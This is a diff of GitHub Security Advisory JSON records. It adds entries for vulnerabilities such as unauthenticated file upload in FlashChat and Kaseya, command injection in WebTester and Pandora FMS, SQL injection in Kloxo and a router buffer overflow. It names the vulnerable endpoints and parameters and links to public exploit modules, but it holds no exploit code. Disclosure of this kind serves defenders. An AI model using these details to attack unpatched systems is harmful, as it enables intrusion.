100644 --- a/advisories/unreviewed/2025/02/GHSA-xqw2-8hr2-gw5r/GHSA-xqw2-8hr2-gw5r.json +++ b/advisories/unreviewed/2025/02/GHSA-xqw2-8hr2-gw5r/GHSA-xqw2-8hr2-gw5r.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-xqw2-8hr2-gw5r", - "modified": "2025-02-05T18:34:46Z", + "modified": "2025-07-31T15:35:44Z", "published": "2025-02-05T18:34:45Z", "aliases": [ "CVE-2024-56133" diff --git a/advisories/unreviewed/2025/07/GHSA-2ff6-7rc2-25pr/GHSA-2ff6-7rc2-25pr.json b/advisories/unreviewed/2025/07/GHSA-2ff6-7rc2-25pr/GHSA-2ff6-7rc2-25pr.json new file mode 100644 index 0000000000000..6be47b9ebbf1a --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-2ff6-7rc2-25pr/GHSA-2ff6-7rc2-25pr.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-2ff6-7rc2-25pr", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2013-10038" + ], + "details": "An unauthenticated arbitrary file upload vulnerability exists in FlashChat versions 6.0.2 and 6.0.4 through 6.0.8. The upload.php endpoint fails to properly validate file types and authentication, allowing attackers to upload malicious PHP scripts. Once uploaded, these scripts can be executed remotely, resulting in arbitrary code execution as the web server user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10038" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/flashchat_upload_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28709" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/37342/flashchat-arbitrary-file-upload" + }, + { + "type": "WEB", + "url": "https://www.phpbb.com/community/viewtopic.php?t=2627786" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/flashchat-arbitrary-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-3w97-v426-7jw9/GHSA-3w97-v426-7jw9.json b/advisories/unreviewed/2025/07/GHSA-3w97-v426-7jw9/GHSA-3w97-v426-7jw9.json new file mode 100644 index 0000000000000..562a4f7a90acf --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-3w97-v426-7jw9/GHSA-3w97-v426-7jw9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3w97-v426-7jw9", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2013-10037" + ], + "details": "An OS command injection vulnerability exists in WebTester version 5.x via the install2.php installation script. The parameters cpusername, cppassword, and cpdomain are passed directly to shell commands without sanitization. A remote unauthenticated attacker can exploit this flaw by sending a crafted HTTP POST request, resulting in arbitrary command execution on the underlying system with web server privileges.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10037" + }, + { + "type": "WEB", + "url": "https://advisories.checkpoint.com/defense/advisories/public/2014/cpai-2014-1620.html" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/webtester_exec.rb" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/p/webtesteronline/bugs/3" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/29132" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/webtester-unauth-command-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-4ww9-x4qj-x6qm/GHSA-4ww9-x4qj-x6qm.json b/advisories/unreviewed/2025/07/GHSA-4ww9-x4qj-x6qm/GHSA-4ww9-x4qj-x6qm.json new file mode 100644 index 0000000000000..b148fa860a7d8 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-4ww9-x4qj-x6qm/GHSA-4ww9-x4qj-x6qm.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4ww9-x4qj-x6qm", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2013-10036" + ], + "details": "A stack-based buffer overflow vulnerability exists in Beetel Connection Manager version PCW_BTLINDV1.0.0B04 when parsing the UserName parameter in the NetConfig.ini configuration file. A crafted .ini file containing an overly long UserName value can overwrite the Structured Exception Handler (SEH), leading to arbitrary code execution when the application processes the file.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10036" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/beetel_netconfig_ini_bof.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/28969" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/37394/beetel-connection-manager-netconfig-username-buffer-overflow" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/beetel-connection-manager-stack-based-buffer-overflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-55x8-7jw5-crjw/GHSA-55x8-7jw5-crjw.json b/advisories/unreviewed/2025/07/GHSA-55x8-7jw5-crjw/GHSA-55x8-7jw5-crjw.json new file mode 100644 index 0000000000000..63613e2acd137 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-55x8-7jw5-crjw/GHSA-55x8-7jw5-crjw.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-55x8-7jw5-crjw", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-8408" + ], + "details": "A vulnerability, which was classified as critical, was found in code-projects Vehicle Management 1.0. Affected is an unknown function of the file /filter1.php. The manipulation of the argument vehicle leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8408" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/2" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318396" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318396" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.624010" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:40Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-5f4x-mf64-8g2r/GHSA-5f4x-mf64-8g2r.json b/advisories/unreviewed/2025/07/GHSA-5f4x-mf64-8g2r/GHSA-5f4x-mf64-8g2r.json index c516a56014221..fb07e0c1039a9 100644 --- a/advisories/unreviewed/2025/07/GHSA-5f4x-mf64-8g2r/GHSA-5f4x-mf64-8g2r.json +++ b/advisories/unreviewed/2025/07/GHSA-5f4x-mf64-8g2r/GHSA-5f4x-mf64-8g2r.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-502" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-6r87-23pq-fxxg/GHSA-6r87-23pq-fxxg.json b/advisories/unreviewed/2025/07/GHSA-6r87-23pq-fxxg/GHSA-6r87-23pq-fxxg.json new file mode 100644 index 0000000000000..7e8039c56a93b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6r87-23pq-fxxg/GHSA-6r87-23pq-fxxg.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6r87-23pq-fxxg", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125122" + ], + "details": "A stack-based buffer overflow vulnerability exists in the tmUnblock.cgi endpoint of the Linksys WRT120N wireless router. The vulnerability is triggered by sending a specially crafted HTTP POST request with an overly long TM_Block_URL parameter to the endpoint. By exploiting this flaw, an unauthenticated remote attacker can overwrite memory in a controlled manner, enabling them to temporarily reset the administrator password of the device to a blank value. This grants unauthorized access to the router’s web management interface without requiring valid credentials.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:A/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125122" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/admin/http/linksys_tmunblock_admin_reset_bof.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20210424073058/http://www.devttys0.com/2014/02/wrt120n-fprintf-stack-overflow" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/31758" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/linksys-wrt120n-stack-based-buffer-overflow-admin-password-reset" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json b/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json new file mode 100644 index 0000000000000..193633392d5fd --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-6vjc-2rp5-c2hr/GHSA-6vjc-2rp5-c2hr.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-6vjc-2rp5-c2hr", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-29557" + ], + "details": "ExaGrid EX10 6.3 - 7.0.1.P08 is vulnerable to Incorrect Access Control in the MailConfiguration API endpoint, where users with operator-level privileges can issue an HTTP request to retrieve SMTP credentials, including plaintext passwords.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29557" + }, + { + "type": "WEB", + "url": "https://github.com/0xsu3ks/CVE-2025-29557" + }, + { + "type": "WEB", + "url": "https://www.exagrid.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-7x25-h6x3-94h7/GHSA-7x25-h6x3-94h7.json b/advisories/unreviewed/2025/07/GHSA-7x25-h6x3-94h7/GHSA-7x25-h6x3-94h7.json new file mode 100644 index 0000000000000..afbbefe75fe02 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-7x25-h6x3-94h7/GHSA-7x25-h6x3-94h7.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-7x25-h6x3-94h7", + "modified": "2025-07-31T15:35:48Z", + "published": "2025-07-31T15:35:48Z", + "aliases": [ + "CVE-2025-8407" + ], + "details": "A vulnerability, which was classified as critical, has been found in code-projects Vehicle Management 1.0. This issue affects some unknown processing of the file /filter2.php. The manipulation of the argument from leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8407" + }, + { + "type": "WEB", + "url": "https://github.com/wllovemy/cve/issues/3" + }, + { + "type": "WEB", + "url": "https://code-projects.org" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?ctiid.318395" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?id.318395" + }, + { + "type": "WEB", + "url": "https://vuldb.com/?submit.624009" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-74" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T14:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-86jp-9w2g-x862/GHSA-86jp-9w2g-x862.json b/advisories/unreviewed/2025/07/GHSA-86jp-9w2g-x862/GHSA-86jp-9w2g-x862.json new file mode 100644 index 0000000000000..8092cef17c58b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-86jp-9w2g-x862/GHSA-86jp-9w2g-x862.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-86jp-9w2g-x862", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2013-10034" + ], + "details": "An unrestricted file upload vulnerability exists in Kaseya KServer versions prior to 6.3.0.2. The uploadImage.asp endpoint allows unauthenticated users to upload files to arbitrary paths via a crafted filename parameter in a multipart/form-data POST request. Due to the lack of authentication and input sanitation, an attacker can upload a file with an .asp extension to a web-accessible directory, which can then be invoked to execute arbitrary code with the privileges of the IUSR account. The vulnerability enables remote code execution without prior authentication and was resolved in version 6.3.0.2 by removing the vulnerable uploadImage.asp endpoint.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10034" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/http/kaseya_uploadimage_file_upload.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150210113922/http://security-assessment.com/files/documents/advisory/Kaseya%20File%20Upload.pdf" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/29675" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kaseya-arbitrary-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-88g5-2w2f-r74m/GHSA-88g5-2w2f-r74m.json b/advisories/unreviewed/2025/07/GHSA-88g5-2w2f-r74m/GHSA-88g5-2w2f-r74m.json new file mode 100644 index 0000000000000..d0caf08487a9c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-88g5-2w2f-r74m/GHSA-88g5-2w2f-r74m.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-88g5-2w2f-r74m", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125123" + ], + "details": "An unauthenticated SQL injection vulnerability exists in the Kloxo web hosting control panel (developed by LXCenter) prior to version 6.1.12. The flaw resides in the login-name parameter passed to lbin/webcommand.php, which fails to properly sanitize input, allowing an attacker to extract the administrator’s password from the backend database. After recovering valid credentials, the attacker can authenticate to the Kloxo control panel and leverage the Command Center feature (display.php) to execute arbitrary operating system commands as root on the underlying host system. This vulnerability was reported to be exploited in the wild in January 2014.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125123" + }, + { + "type": "WEB", + "url": "https://github.com/lxcenter/kloxo" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/kloxo_sqli.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20140301125222/http://www.webhostingtalk.com/showthread.php?p=8996984" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20141118054734/https://vpsboard.com/topic/3384-kloxo-installations-compromised" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/31577" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kloxo-unauth-sqli-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-99x8-h6hx-3fg9/GHSA-99x8-h6hx-3fg9.json b/advisories/unreviewed/2025/07/GHSA-99x8-h6hx-3fg9/GHSA-99x8-h6hx-3fg9.json new file mode 100644 index 0000000000000..5522dff450347 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-99x8-h6hx-3fg9/GHSA-99x8-h6hx-3fg9.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-99x8-h6hx-3fg9", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2013-10040" + ], + "details": "ClipBucket version 2.6 and earlier contains a critical vulnerability in the ofc_upload_image.php script located at /admin_area/charts/ofc-library/. This endpoint allows unauthenticated users to upload arbitrary files, including executable PHP scripts. Once uploaded, the attacker can access the file via a predictable path and trigger remote code execution.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10040" + }, + { + "type": "WEB", + "url": "https://clipbucket.com" + }, + { + "type": "WEB", + "url": "https://github.com/arslancb/clipbucket" + }, + { + "type": "WEB", + "url": "https://packetstorm.news/files/id/123480" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/clipbucket_upload_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/clipbucket-arbitrary-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-434" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json b/advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json new file mode 100644 index 0000000000000..e87af9e7ea022 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9qm3-6qrr-c76m/GHSA-9qm3-6qrr-c76m.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9qm3-6qrr-c76m", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-34146" + ], + "details": "A prototype pollution vulnerability exists in @nyariv/sandboxjs versions <= 0.8.23, allowing attackers to inject arbitrary properties into Object.prototype via crafted JavaScript code. This can result in a denial-of-service (DoS) condition or, under certain conditions, escape the sandboxed environment intended to restrict code execution. The vulnerability stems from insufficient prototype access checks in the sandbox’s executor logic, particularly in the handling of JavaScript function objects returned.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-34146" + }, + { + "type": "WEB", + "url": "https://github.com/nyariv/SandboxJS/issues/31" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Hagrid29/9df27829a491080f923c4f6b8518d7e3" + }, + { + "type": "WEB", + "url": "https://www.npmjs.com/package/@nyariv/sandboxjs" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/nyariv-sandboxjs-prototype-pollution-sandbox-escape-dos" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-1321" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-9whg-3jfv-8hgp/GHSA-9whg-3jfv-8hgp.json b/advisories/unreviewed/2025/07/GHSA-9whg-3jfv-8hgp/GHSA-9whg-3jfv-8hgp.json new file mode 100644 index 0000000000000..5193f0218491e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-9whg-3jfv-8hgp/GHSA-9whg-3jfv-8hgp.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9whg-3jfv-8hgp", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125124" + ], + "details": "An unauthenticated remote command execution vulnerability exists in Pandora FMS versions up to and including 5.0RC1 via the Anyterm web interface, which listens on TCP port 8023. The anyterm-module endpoint accepts unsanitized user input via the p parameter and directly injects it into a shell command, allowing arbitrary command execution as the pandora user. In certain versions (notably 4.1 and 5.0RC1), the pandora user can elevate privileges to root without a password using a chain involving the artica user account. This account is typically installed without a password and is configured to run sudo without authentication. Therefore, full system compromise is possible without any credentials.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125124" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/pandora_fms_exec.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/31518" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/pandora-fms-anyterm-unauth-command-injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-c8cm-6cj9-946w/GHSA-c8cm-6cj9-946w.json b/advisories/unreviewed/2025/07/GHSA-c8cm-6cj9-946w/GHSA-c8cm-6cj9-946w.json new file mode 100644 index 0000000000000..5d781b8607005 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-c8cm-6cj9-946w/GHSA-c8cm-6cj9-946w.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c8cm-6cj9-946w", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125125" + ], + "details": "A path traversal vulnerability exists in A10 Networks AX Loadbalancer versions 2.6.1-GR1-P5, 2.7.0, and earlier. The vulnerability resides in the handling of the filename parameter in the /xml/downloads endpoint, which fails to properly sanitize user input. An unauthenticated attacker can exploit this flaw by sending crafted HTTP requests containing directory traversal sequences to read arbitrary files outside the intended directory. The files returned by the vulnerable endpoint are deleted from the system after retrieval. This can lead to unauthorized disclosure of sensitive information such as SSL certificates and private keys, as well as unintended file deletion.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125125" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/auxiliary/scanner/http/a10networks_ax_directory_traversal.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/31261" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/a10-networks-ax-loadbalancer-path-traversal" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-22" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json b/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json new file mode 100644 index 0000000000000..0fd290764951d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-cmjc-2g23-9m8c/GHSA-cmjc-2g23-9m8c.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-cmjc-2g23-9m8c", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-50270" + ], + "details": "A stored Cross Site Scripting (xss) vulnerability in the \"content management\" feature in AnQiCMS v.3.4.11 allows a remote attacker to execute arbitrary code via a crafted script to 